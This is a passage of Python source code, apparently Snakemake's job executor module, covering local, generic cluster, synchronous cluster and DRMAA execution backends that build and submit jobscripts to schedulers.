flag = f"--{property.replace('_', '-')}"
if invert and isinstance(value, bool):
value = not value
return format_cli_arg(flag, value, quote=quote)
@lazy_property
def general_args(self):
"""Return a string to add to self.exec_job that includes additional
arguments from the command line. This is currently used in the
ClusterExecutor and CPUExecutor, as both were using the same
code. Both have base class of the RealExecutor.
"""
w2a = self.workflow_property_to_arg
return join_cli_args(
[
"--force",
"--keep-target-files",
"--keep-remote",
"--max-inventory-time 0",
"--nocolor",
"--notemp",
"--no-hooks",
"--nolock",
"--ignore-incomplete",
w2a("cleanup_scripts", flag="--skip-script-cleanup"),
w2a("shadow_prefix"),
w2a("use_conda"),
w2a("conda_frontend"),
w2a("conda_prefix"),
w2a("conda_base_path", skip=not self.assume_shared_fs),
w2a("use_singularity"),
w2a("singularity_prefix"),
w2a("singularity_args"),
w2a("execute_subworkflows", flag="--no-subworkflows", invert=True),
w2a("max_threads"),
w2a("use_env_modules", flag="--use-envmodules"),
w2a("keep_metadata", flag="--drop-metadata", invert=True),
w2a("wrapper_prefix"),
w2a("overwrite_threads", flag="--set-threads"),
w2a("overwrite_scatter", flag="--set-scatter"),
w2a("local_groupid", skip=self.job_specific_local_groupid),
w2a("conda_not_block_search_path_envvars"),
w2a("overwrite_configfiles", flag="--configfiles"),
w2a("config_args", flag="--config"),
w2a("printshellcmds"),
w2a("latency_wait"),
w2a("scheduler_type", flag="--scheduler"),
format_cli_arg(
"--scheduler-solver-path",
os.path.dirname(sys.executable),
skip=not self.assume_shared_fs,
),
self.get_set_resources_args(),
self.get_default_remote_provider_args(),
self.get_default_resources_args(),
self.get_workdir_arg(),
format_cli_arg("--mode", self.get_exec_mode()),
]
)
def get_workdir_arg(self):
return self.workflow_property_to_arg("overwrite_workdir", flag="--directory")
def get_job_args(self, job, **kwargs):
return join_cli_args(
[
format_cli_pos_arg(kwargs.get("target", self.get_job_targets(job))),
# Restrict considered rules for faster DAG computation.
# This does not work for updated jobs because they need
# to be updated in the spawned process as well.
format_cli_arg(
"--allowed-rules",
job.rules,
quote=False,
skip=job.is_branched or job.is_updated,
),
# Ensure that a group uses its proper local groupid.
format_cli_arg("--local-groupid", job.jobid, skip=not job.is_group()),
format_cli_arg("--cores", kwargs.get("cores", self.cores)),
format_cli_arg("--attempt", job.attempt),
format_cli_arg("--force-use-threads", not job.is_group()),
]
)
@property
def job_specific_local_groupid(self):
return True
def get_snakefile(self):
return self.snakefile
def get_job_targets(self, job):
return job.get_targets()
@abstractmethod
def get_python_executable(self):
...
@abstractmethod
def get_exec_mode(self):
...
@abstractmethod
def get_envvar_declarations(self):
...
def get_job_exec_prefix(self, job):
return ""
def get_job_exec_suffix(self, job):
return ""
def format_job_exec(self, job):
prefix = self.get_job_exec_prefix(job)
if prefix:
prefix += " &&"
suffix = self.get_job_exec_suffix(job)
if suffix:
suffix = f"&& {suffix}"
return join_cli_args(
[
prefix,
self.get_envvar_declarations(),
self.get_python_executable(),
"-m snakemake",
format_cli_arg("--snakefile", self.get_snakefile()),
self.get_job_args(job),
self.general_args,
suffix,
]
)
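# For orientation: format_job_exec() above assembles a command line that
# re-invokes Snakemake for a single job. Depending on the workflow settings it
# looks roughly like the following; all paths, targets and flags shown here are
# illustrative, not what Snakemake emits verbatim:
#
#   cd /data/workdir && /usr/bin/python3 -m snakemake \
#       --snakefile /data/workdir/Snakefile results/sample1.txt \
#       --allowed-rules myrule --cores 4 --attempt 1 \
#       --force --keep-target-files --nolock --ignore-incomplete ...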
class TouchExecutor(RealExecutor):
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
try:
# Touching of output files will be done by handle_job_success
time.sleep(0.1)
callback(job)
except OSError as ex:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job, ignore_missing_output=True)
_ProcessPoolExceptions = (KeyboardInterrupt,)
try:
from concurrent.futures.process import BrokenProcessPool
_ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool)
except ImportError:
pass
class CPUExecutor(RealExecutor):
def __init__(
self,
workflow,
dag,
workers,
printreason=False,
quiet=False,
printshellcmds=False,
use_threads=False,
cores=1,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
keepincomplete=keepincomplete,
)
self.use_threads = use_threads
self.cores = cores
# Zero thread jobs do not need a thread, but they occupy additional workers.
# Hence we need to reserve additional workers for them.
self.workers = workers + 5
self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.workers)
@property
def job_specific_local_groupid(self):
return False
def get_job_exec_prefix(self, job):
return f"cd {self.workflow.workdir_init}"
def get_exec_mode(self):
return Mode.subprocess
def get_python_executable(self):
return sys.executable
def get_envvar_declarations(self):
return ""
def get_job_args(self, job, **kwargs):
return f"{super().get_job_args(job, **kwargs)} --quiet"
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
if job.is_group():
# if we still don't have enough workers for this group, create a new pool here
missing_workers = max(len(job) - self.workers, 0)
if missing_workers:
self.workers += missing_workers
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=self.workers
)
# the future waits for the entire group job
future = self.pool.submit(self.run_group_job, job)
else:
future = self.run_single_job(job)
future.add_done_callback(partial(self._callback, job, callback, error_callback))
def job_args_and_prepare(self, job):
job.prepare()
conda_env = (
job.conda_env.address if self.workflow.use_conda and job.conda_env else None
)
container_img = (
job.container_img_path if self.workflow.use_singularity else None
)
env_modules = job.env_modules if self.workflow.use_env_modules else None
benchmark = None
benchmark_repeats = job.benchmark_repeats or 1
if job.benchmark is not None:
benchmark = str(job.benchmark)
return (
job.rule,
job.input._plainstrings(),
job.output._plainstrings(),
job.params,
job.wildcards,
job.threads,
job.resources,
job.log._plainstrings(),
benchmark,
benchmark_repeats,
conda_env,
container_img,
self.workflow.singularity_args,
env_modules,
self.workflow.use_singularity,
self.workflow.linemaps,
self.workflow.debug,
self.workflow.cleanup_scripts,
job.shadow_dir,
job.jobid,
self.workflow.edit_notebook if self.dag.is_edit_notebook_job(job) else None,
self.workflow.conda_base_path,
job.rule.basedir,
self.workflow.sourcecache.runtime_cache_path,
)
def run_single_job(self, job):
if (
self.use_threads
or (not job.is_shadow and not job.is_run)
or job.is_template_engine
):
future = self.pool.submit(
self.cached_or_run, job, run_wrapper, *self.job_args_and_prepare(job)
)
else:
# run directive jobs are spawned into subprocesses
future = self.pool.submit(self.cached_or_run, job, self.spawn_job, job)
return future
def run_group_job(self, job):
"""Run a pipe or service group job.
This lets all items run simultaneously."""
# we only have to consider pipe or service groups because in local running mode,
# these are the only groups that will occur
futures = [self.run_single_job(j) for j in job]
n_non_service = sum(1 for j in job if not j.is_service)
while True:
n_finished = 0
for f in futures:
if f.done():
ex = f.exception()
if ex is not None:
# kill all shell commands of the other group jobs
# there can be only shell commands because the
# run directive is not allowed for pipe jobs
for j in job:
shell.kill(j.jobid)
raise ex
else:
n_finished += 1
if n_finished >= n_non_service:
# terminate all service jobs since all consumers are done
for j in job:
if j.is_service:
logger.info(
f"Terminating service job {j.jobid} since all consuming jobs are finished."
)
shell.terminate(j.jobid)
logger.info(
f"Service job {j.jobid} has been successfully terminated."
)
return
time.sleep(1)
def spawn_job(self, job):
cmd = self.format_job_exec(job)
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
raise SpawnedJobError()
def cached_or_run(self, job, run_func, *args):
"""
Either retrieve result from cache, or run job with given function.
"""
to_cache = self.workflow.is_cached_rule(job.rule)
try:
if to_cache:
self.workflow.output_file_cache.fetch(job)
return
except CacheMissException:
pass
run_func(*args)
if to_cache:
self.workflow.output_file_cache.store(job)
def shutdown(self):
self.pool.shutdown()
def cancel(self):
self.pool.shutdown()
def _callback(self, job, callback, error_callback, future):
try:
ex = future.exception()
if ex is not None:
raise ex
callback(job)
except _ProcessPoolExceptions:
self.handle_job_error(job)
# no error callback, just silently ignore the interrupt as the main scheduler is also killed
except SpawnedJobError:
# don't print error message, this is done by the spawned subprocess
error_callback(job)
except (Exception, BaseException) as ex:
self.print_job_error(job)
if not (job.is_group() or job.shellcmd) or self.workflow.verbose:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job)
def handle_job_error(self, job):
super().handle_job_error(job)
if not self.keepincomplete:
job.cleanup()
self.workflow.persistence.cleanup(job)
class ClusterExecutor(RealExecutor):
"""Backend for distributed execution.
The key idea is that a job is converted into a script that invokes Snakemake again, in whatever environment is targeted. The script is submitted to some job management platform (e.g. a cluster scheduler like slurm).
    This class can be specialized to generate more specific backends, e.g. for cloud platforms.
"""
default_jobscript = "jobscript.sh"
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{name}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
cluster_config=None,
local_input=None,
restart_times=None,
exec_job=None,
assume_shared_fs=True,
max_status_checks_per_second=1,
disable_default_remote_provider_args=False,
disable_default_resources_args=False,
disable_envvar_declarations=False,
keepincomplete=False,
):
from ratelimiter import RateLimiter
local_input = local_input or []
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
assume_shared_fs=assume_shared_fs,
keepincomplete=keepincomplete,
)
if not self.assume_shared_fs:
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
self.is_default_jobscript = False
jobscript = workflow.jobscript
if jobscript is None:
jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript)
self.is_default_jobscript = True
try:
with open(jobscript) as f:
self.jobscript = f.read()
except IOError as e:
raise WorkflowError(e)
if not "jobid" in get_wildcard_names(jobname):
raise WorkflowError(
'Defined jobname ("{}") has to contain the wildcard {jobid}.'
)
self.jobname = jobname
self._tmpdir = None
self.cores = cores if cores else "all"
self.cluster_config = cluster_config if cluster_config else dict()
self.restart_times = restart_times
self.active_jobs = list()
self.lock = threading.Lock()
self.wait = True
self.wait_thread = threading.Thread(target=self._wait_thread)
self.wait_thread.daemon = True
self.wait_thread.start()
self.disable_default_remote_provider_args = disable_default_remote_provider_args
self.disable_default_resources_args = disable_default_resources_args
self.disable_envvar_declarations = disable_envvar_declarations
self.max_status_checks_per_second = max_status_checks_per_second
self.status_rate_limiter = RateLimiter(
max_calls=self.max_status_checks_per_second, period=1
)
def get_default_remote_provider_args(self):
if not self.disable_default_remote_provider_args:
return super().get_default_remote_provider_args()
else:
return ""
def get_default_resources_args(self, default_resources=None):
if not self.disable_default_resources_args:
return super().get_default_resources_args(default_resources)
else:
return ""
def get_workdir_arg(self):
if self.assume_shared_fs:
return super().get_workdir_arg()
return ""
def get_envvar_declarations(self):
if not self.disable_envvar_declarations:
return " ".join(
f"{var}={repr(os.environ[var])}" for var in self.workflow.envvars
)
else:
return ""
def get_python_executable(self):
return sys.executable if self.assume_shared_fs else "python"
def get_exec_mode(self):
return Mode.cluster
def get_job_args(self, job):
waitfiles_parameter = ""
if self.assume_shared_fs:
wait_for_files = []
wait_for_files.append(self.tmpdir)
wait_for_files.extend(job.get_wait_for_files())
# Only create extra file if we have more than 20 input files.
# This should not require the file creation in most cases.
if len(wait_for_files) > 20:
wait_for_files_file = self.get_jobscript(job) + ".waitforfilesfile.txt"
with open(wait_for_files_file, "w") as fd:
print(*wait_for_files, sep="\n", file=fd)
waitfiles_parameter = format_cli_arg(
"--wait-for-files-file", wait_for_files_file
)
else:
waitfiles_parameter = format_cli_arg("--wait-for-files", wait_for_files)
return f"{super().get_job_args(job)} {waitfiles_parameter}"
def _wait_thread(self):
try:
self._wait_for_jobs()
except Exception as e:
self.workflow.scheduler.executor_error_callback(e)
def shutdown(self):
with self.lock:
self.wait = False
self.wait_thread.join()
if not self.workflow.immediate_submit:
# Only delete tmpdir (containing jobscripts) if not using
# immediate_submit. With immediate_submit, jobs can be scheduled
# after this method is completed. Hence we have to keep the
# directory.
shutil.rmtree(self.tmpdir)
def cancel(self):
self.shutdown()
def _run(self, job, callback=None, error_callback=None):
if self.assume_shared_fs:
job.remove_existing_output()
job.download_remote_input()
super()._run(job, callback=callback, error_callback=error_callback)
@property
def tmpdir(self):
if self._tmpdir is None:
self._tmpdir = tempfile.mkdtemp(dir=".snakemake", prefix="tmp.")
return os.path.abspath(self._tmpdir)
def get_jobscript(self, job):
f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job))
if os.path.sep in f:
raise WorkflowError(
"Path separator ({}) found in job name {}. "
"This is not supported.".format(os.path.sep, f)
)
return os.path.join(self.tmpdir, f)
def write_jobscript(self, job, jobscript):
exec_job = self.format_job_exec(job)
try:
content = self.jobscript.format(
properties=job.properties(cluster=self.cluster_params(job)),
exec_job=exec_job,
)
except KeyError as e:
if self.is_default_jobscript:
raise e
else:
raise WorkflowError(
f"Error formatting custom jobscript {self.workflow.jobscript}: value for {e} not found.\n"
"Make sure that your custom jobscript is defined as expected."
)
logger.debug("Jobscript:\n{}".format(content))
with open(jobscript, "w") as f:
print(content, file=f)
os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR | stat.S_IRUSR)
def cluster_params(self, job):
"""Return wildcards object for job from cluster_config."""
cluster = self.cluster_config.get("__default__", dict()).copy()
cluster.update(self.cluster_config.get(job.name, dict()))
# Format values with available parameters from the job.
for key, value in list(cluster.items()):
if isinstance(value, str):
try:
cluster[key] = job.format_wildcards(value)
except NameError as e:
if job.is_group():
msg = (
"Failed to format cluster config for group job. "
"You have to ensure that your default entry "
"does not contain any items that group jobs "
"cannot provide, like {rule}, {wildcards}."
)
else:
msg = (
"Failed to format cluster config "
"entry for job {}.".format(job.rule.name)
)
raise WorkflowError(msg, e)
return cluster
def cluster_wildcards(self, job):
return Wildcards(fromdict=self.cluster_params(job))
def handle_job_success(self, job):
super().handle_job_success(
job, upload_remote=False, handle_log=False, handle_touch=False
)
def handle_job_error(self, job):
# TODO what about removing empty remote dirs?? This cannot be decided
# on the cluster node.
super().handle_job_error(job, upload_remote=False)
logger.debug("Cleanup job metadata.")
# We have to remove metadata here as well.
# It will be removed by the CPUExecutor in case of a shared FS,
# but we might not see the removal due to filesystem latency.
# By removing it again, we make sure that it is gone on the host FS.
if not self.keepincomplete:
self.workflow.persistence.cleanup(job)
            # Also clean up the job's output files, in case the remote job
            # was not able to, e.g. due to a timeout.
            logger.debug("Cleaning up output files of the failed job.")
job.cleanup()
def print_cluster_job_error(self, job_info, jobid):
job = job_info.job
kind = (
"rule {}".format(job.rule.name)
if not job.is_group()
else "group job {}".format(job.groupid)
)
logger.error(
"Error executing {} on cluster (jobid: {}, external: "
"{}, jobscript: {}). For error details see the cluster "
"log and the log files of the involved rule(s).".format(
kind, jobid, job_info.jobid, job_info.jobscript
)
)
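# A sketch of the jobscript template that write_jobscript() above expects: a
# plain text file with str.format() placeholders {properties} and {exec_job}.
# Snakemake's bundled default jobscript may differ in detail; this only shows
# the contract a custom --jobscript has to fulfil.
#
#   #!/bin/sh
#   # properties = {properties}
#   {exec_job}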
GenericClusterJob = namedtuple(
"GenericClusterJob",
"job jobid callback error_callback jobscript jobfinished jobfailed",
)
class GenericClusterExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
statuscmd=None,
cancelcmd=None,
cancelnargs=None,
sidecarcmd=None,
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
):
self.submitcmd = submitcmd
if not assume_shared_fs and statuscmd is None:
raise WorkflowError(
"When no shared filesystem can be assumed, a "
"status command must be given."
)
self.statuscmd = statuscmd
self.cancelcmd = cancelcmd
self.sidecarcmd = sidecarcmd
self.cancelnargs = cancelnargs
self.external_jobid = dict()
# We need to collect all external ids so we can properly cancel even if
# the status update queue is running.
self.all_ext_jobids = list()
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
)
self.sidecar_vars = None
if self.sidecarcmd:
self._launch_sidecar()
if not statuscmd and not assume_shared_fs:
raise WorkflowError(
"If no shared filesystem is used, you have to "
"specify a cluster status command."
)
def get_job_exec_prefix(self, job):
if self.assume_shared_fs:
# quoting the workdir since it may contain spaces
return f"cd {repr(self.workflow.workdir_init)}"
else:
return ""
def get_job_exec_suffix(self, job):
if self.statuscmd:
return "exit 0 || exit 1"
elif self.assume_shared_fs:
# TODO wrap with watch and touch {jobrunning}
# check modification date of {jobrunning} in the wait_for_job method
return (
f"touch {repr(self.get_jobfinished_marker(job))} || "
f"(touch {repr(self.get_jobfailed_marker(job))}; exit 1)"
)
assert False, "bug: neither statuscmd defined nor shared FS"
def get_jobfinished_marker(self, job):
return os.path.join(self.tmpdir, "{}.jobfinished".format(job.jobid))
def get_jobfailed_marker(self, job):
return os.path.join(self.tmpdir, "{}.jobfailed".format(job.jobid))
def _launch_sidecar(self):
def copy_stdout(executor, process):
"""Run sidecar process and copy it's stdout to our stdout."""
while process.poll() is None and executor.wait:
buf = process.stdout.readline()
if buf:
sys.stdout.write(buf)
# one final time ...
buf = process.stdout.readline()
if buf:
sys.stdout.write(buf)
def wait(executor, process):
while executor.wait:
time.sleep(0.5)
process.terminate()
process.wait()
logger.info(
"Cluster sidecar process has terminated (retcode=%d)."
% process.returncode
)
logger.info("Launch sidecar process and read first output line.")
process = subprocess.Popen(
self.sidecarcmd, stdout=subprocess.PIPE, shell=False, encoding="utf-8"
)
self.sidecar_vars = process.stdout.readline()
while self.sidecar_vars and self.sidecar_vars[-1] in "\n\r":
self.sidecar_vars = self.sidecar_vars[:-1]
logger.info("Done reading first output line.")
thread_stdout = threading.Thread(
target=copy_stdout, name="sidecar_stdout", args=(self, process)
)
thread_stdout.start()
thread_wait = threading.Thread(
            target=wait, name="sidecar_wait", args=(self, process)
)
thread_wait.start()
def cancel(self):
def _chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i : i + n]
if self.cancelcmd: # We have --cluster-cancel
# Enumerate job IDs and create chunks. If cancelnargs evaluates to false (0/None)
# then pass all job ids at once
jobids = list(self.all_ext_jobids)
chunks = list(_chunks(jobids, self.cancelnargs or len(jobids)))
# Go through the chunks and cancel the jobs, warn in case of failures.
failures = 0
for chunk in chunks:
try:
cancel_timeout = 2 # rather fail on timeout than miss canceling all
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
subprocess.check_call(
[self.cancelcmd] + chunk,
shell=False,
timeout=cancel_timeout,
env=env,
)
except subprocess.SubprocessError:
failures += 1
if failures:
logger.info(
(
"{} out of {} calls to --cluster-cancel failed. This is safe to "
"ignore in most cases."
).format(failures, len(chunks))
)
else:
logger.info(
"No --cluster-cancel given. Will exit after finishing currently running jobs."
)
self.shutdown()
def register_job(self, job):
# Do not register job here.
# Instead do it manually once the jobid is known.
pass
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobid = job.jobid
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
jobfinished = self.get_jobfinished_marker(job)
jobfailed = self.get_jobfailed_marker(job)
if self.statuscmd:
ext_jobid = self.dag.incomplete_external_jobid(job)
if ext_jobid:
# Job is incomplete and still running.
# We simply register it and wait for completion or failure.
logger.info(
"Resuming incomplete job {} with external jobid '{}'.".format(
jobid, ext_jobid
)
)
submit_callback(job)
with self.lock:
self.all_ext_jobids.append(ext_jobid)
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
return
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
try:
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
# Remove SNAKEMAKE_PROFILE from environment as the snakemake call inside
# of the cluster job must run locally (or complains about missing -j).
env.pop("SNAKEMAKE_PROFILE", None)
ext_jobid = (
subprocess.check_output(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
env=env,
)
.decode()
.split("\n")
)
except subprocess.CalledProcessError as ex:
logger.error(
"Error submitting jobscript (exit code {}):\n{}".format(
ex.returncode, ex.output.decode()
)
)
error_callback(job)
return
if ext_jobid and ext_jobid[0]:
ext_jobid = ext_jobid[0]
self.external_jobid.update((f, ext_jobid) for f in job.output)
logger.info(
"Submitted {} {} with external jobid '{}'.".format(
"group job" if job.is_group() else "job", jobid, ext_jobid
)
)
self.workflow.persistence.started(job, external_jobid=ext_jobid)
submit_callback(job)
with self.lock:
self.all_ext_jobids.append(ext_jobid)
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
def _wait_for_jobs(self):
success = "success"
failed = "failed"
running = "running"
status_cmd_kills = []
if self.statuscmd is not None:
def job_status(job, valid_returns=["running", "success", "failed"]):
try:
# this command shall return "success", "failed" or "running"
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
ret = subprocess.check_output(
"{statuscmd} '{jobid}'".format(
jobid=job.jobid, statuscmd=self.statuscmd
),
shell=True,
env=env,
).decode()
except subprocess.CalledProcessError as e:
if e.returncode < 0:
# Ignore SIGINT and all other issues due to signals
# because it will be caused by hitting e.g.
# Ctrl-C on the main process or sending killall to
# snakemake.
# Snakemake will handle the signal in
# the main process.
status_cmd_kills.append(-e.returncode)
                        if len(status_cmd_kills) > 10:
                            logger.info(
                                "Cluster status command {} was killed >10 times with signal(s) {} "
                                "(if this happens unexpectedly during your workflow execution, "
                                "have a closer look).".format(
                                    self.statuscmd,
                                    ",".join(str(sig) for sig in status_cmd_kills),
                                )
                            )
                            status_cmd_kills.clear()
else:
raise WorkflowError(
"Failed to obtain job status. "
"See above for error message."
)
ret = ret.strip().split("\n")
if len(ret) != 1 or ret[0] not in valid_returns:
raise WorkflowError(
"Cluster status command {} returned {} but just a single line with one of {} is expected.".format(
self.statuscmd, "\\n".join(ret), ",".join(valid_returns)
)
)
return ret[0]
else:
def job_status(job):
if os.path.exists(active_job.jobfinished):
os.remove(active_job.jobfinished)
os.remove(active_job.jobscript)
return success
if os.path.exists(active_job.jobfailed):
os.remove(active_job.jobfailed)
os.remove(active_job.jobscript)
return failed
return running
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
# logger.debug("Checking status of {} jobs.".format(len(active_jobs)))
for active_job in active_jobs:
with self.status_rate_limiter:
status = job_status(active_job)
if status == success:
active_job.callback(active_job.job)
elif status == failed:
self.print_job_error(
active_job.job,
cluster_jobid=active_job.jobid
if active_job.jobid
else "unknown",
)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
still_running.append(active_job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
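# A sketch of a command line that ends up using GenericClusterExecutor; the
# flag values are illustrative, and status.py / cancel.sh stand for
# user-provided scripts that print "running"/"success"/"failed" for a job id
# and cancel the given job ids, respectively:
#
#   snakemake --jobs 100 \
#       --cluster "sbatch --parsable" \
#       --cluster-status ./status.py \
#       --cluster-cancel ./cancel.sh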
SynchronousClusterJob = namedtuple(
"SynchronousClusterJob", "job jobid callback error_callback jobscript process"
)
class SynchronousClusterExecutor(ClusterExecutor):
"""
invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are
synchronous, blocking the foreground thread and returning the
remote exit code at remote exit.
"""
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
restart_times=0,
assume_shared_fs=True,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=10,
keepincomplete=keepincomplete,
)
self.submitcmd = submitcmd
self.external_jobid = dict()
def get_job_exec_prefix(self, job):
if self.assume_shared_fs:
return f"cd {self.workflow.workdir_init}"
else:
return ""
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
process = subprocess.Popen(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
SynchronousClusterJob(
job, process.pid, callback, error_callback, jobscript, process
)
)
def _wait_for_jobs(self):
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
exitcode = active_job.process.poll()
if exitcode is None:
# job not yet finished
still_running.append(active_job)
elif exitcode == 0:
# job finished successfully
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
else:
# job failed
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
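# A sketch of invoking the synchronous variant: the submit command itself
# blocks until the cluster job has finished, so no status command is needed
# (values are illustrative):
#
#   snakemake --jobs 50 --cluster-sync "qsub -sync y"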
DRMAAClusterJob = namedtuple(
"DRMAAClusterJob", "job jobid callback error_callback jobscript"
)
class DRMAAExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
drmaa_args="",
drmaa_log_dir=None,
cluster_config=None,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
)
try:
import drmaa
except ImportError:
raise WorkflowError(
"Python support for DRMAA is not installed. "
"Please install it, e.g. with easy_install3 --user drmaa"
)
except RuntimeError as e:
raise WorkflowError("Error loading drmaa support:\n{}".format(e))
self.session = drmaa.Session()
self.drmaa_args = drmaa_args
self.drmaa_log_dir = drmaa_log_dir
self.session.initialize()
self.submitted = list()
def get_job_exec_prefix(self, job):
if self.assume_shared_fs:
return f"cd {self.workflow.workdir_init}"
else:
return ""
def cancel(self):
from drmaa.const import JobControlAction
from drmaa.errors import InvalidJobException, InternalException
for jobid in self.submitted:
try:
self.session.control(jobid, JobControlAction.TERMINATE)
except (InvalidJobException, InternalException):
# This is common - logging a warning would probably confuse the user.
pass
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
try:
drmaa_args = job.format_wildcards(
self.drmaa_args, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule)
import drmaa
if self.drmaa_log_dir:
makedirs(self.drmaa_log_dir)
try:
jt = self.session.createJobTemplate()
jt.remoteCommand = jobscript
jt.nativeSpecification = drmaa_args
if self.drmaa_log_dir:
jt.outputPath = ":" + self.drmaa_log_dir
jt.errorPath = ":" + self.drmaa_log_dir
jt.jobName = os.path.basename(jobscript)
jobid = self.session.runJob(jt)
except (
drmaa.DeniedByDrmException,
drmaa.InternalException,
drmaa.InvalidAttributeValueException,
) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps
)
error_callback(job)
return
logger.info(
"Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)
)
self.submitted.append(jobid)
self.session.deleteJobTemplate(jt)
submit_callback(job)
with self.lock:
self.active_jobs.append(
DRMAAClusterJob(job, jobid, callback, error_callback, jobscript)
)
def shutdown(self):
super().shutdown()
self.session.exit()
def _wait_for_jobs(self):
import drmaa
suspended_msg = set()
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
try:
retval = self.session.jobStatus(active_job.jobid)
except drmaa.ExitTimeoutException as e:
# job still active
still_running.append(active_job)
continue
except (drmaa.InternalException, Exception) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)),
self.workflow.linemaps,
)
os.remove(active_job.jobscript)
active_job.error_callback(active_job.job)
continue
if retval == drmaa.JobState.DONE:
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
elif retval == drmaa.JobState.FAILED:
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
# still running
still_running.append(active_job)
def handle_suspended(by):
if active_job.job.jobid not in suspended_msg:
